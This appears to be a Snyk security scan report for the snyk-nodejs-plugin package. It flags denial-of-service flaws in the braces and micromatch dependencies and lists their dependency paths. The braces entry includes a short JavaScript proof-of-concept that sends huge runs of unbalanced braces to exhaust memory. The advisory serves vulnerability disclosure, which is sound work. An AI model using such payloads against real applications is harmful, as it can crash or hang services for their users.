Find, fix and prevent vulnerabilities in your code.
high severity
new
- Vulnerable module: braces
- Introduced through: micromatch@4.0.2 and snyk-nodejs-lockfile-parser@1.56.1
Detailed paths
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › micromatch@4.0.2 › braces@3.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › micromatch@4.0.5 › braces@3.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › micromatch@4.0.5 › braces@3.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › @yarnpkg/shell@2.4.1 › micromatch@4.0.5 › braces@3.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › @yarnpkg/shell@2.4.1 › fast-glob@3.3.2 › micromatch@4.0.5 › braces@3.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › globby@11.1.0 › fast-glob@3.3.2 › micromatch@4.0.5 › braces@3.0.2
Overview
braces is a Bash-like brace expansion, implemented in JavaScript.
Affected versions of this package are vulnerable to Uncontrolled resource consumption due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Remediation
A fix was pushed into the master branch but not yet published.
References
high severity
new
- Vulnerable module: micromatch
- Introduced through: micromatch@4.0.2 and snyk-nodejs-lockfile-parser@1.56.1
Detailed paths
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › micromatch@4.0.2
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › micromatch@4.0.5
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › micromatch@4.0.5
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › @yarnpkg/shell@2.4.1 › micromatch@4.0.5
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › @yarnpkg/shell@2.4.1 › fast-glob@3.3.2 › micromatch@4.0.5
-
Introduced through: snyk-nodejs-plugin@snyk/snyk-nodejs-plugin#2aec43ffacdb6d863f592a5596703ce81817c945 › snyk-nodejs-lockfile-parser@1.56.1 › @yarnpkg/core@2.4.0 › globby@11.1.0 › fast-glob@3.3.2 › micromatch@4.0.5
Overview
Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.
Remediation
A fix was pushed into the master branch but not yet published.